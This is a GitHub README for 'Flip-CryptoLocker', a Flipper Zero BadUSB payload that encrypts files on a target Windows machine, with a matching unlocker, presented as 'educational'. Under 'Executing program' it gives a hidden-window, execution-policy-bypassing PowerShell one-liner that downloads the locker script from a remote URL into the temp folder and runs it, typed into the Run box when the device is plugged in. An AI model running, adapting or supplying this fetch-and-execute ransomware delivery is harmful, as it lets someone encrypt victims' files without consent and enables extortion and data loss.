Flipper-Zero-BadUSB/Payloads/Flip-CryptoLocker/README.md
2023-10-31 11:23:03 -04:00

3.7 KiB

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments

Flip-CryptoLocker and Unlocker

Scripts designed for educational purposes to encrypt and decrypt files on a target machine.

Description

The Flip-CryptoLocker script encrypts files on the user's machine while the Flip-CryptoUnlocker decrypts them. These scripts are designed purely for educational and demonstration purposes.

Getting Started

Dependencies

  • An internet connection
  • Windows 10,11

(back to top)

Executing program

  • Plug in your device
  • Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload
powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";irm -Uri 'https://raw.githubusercontent.com/ooovenenoso/Flipper-Zero-BadUSB/main/Payloads/Flip-CryptoLocker/Flip-CryptoLocker.ps1' -O "$D\locker.ps1"; & "$D\locker.ps1"

(back to top)

Contributing

ooovenenoso

(back to top)

Version History

  • 0.1
    • Initial Release

(back to top)

Contact

📱 My Socials 📱

C#
YouTube
Python
Twitter
Golang
Instagram
Jsonnet
Discord
Jsonnet
TikTok

(back to top)

Acknowledgments

(back to top)

Github Stats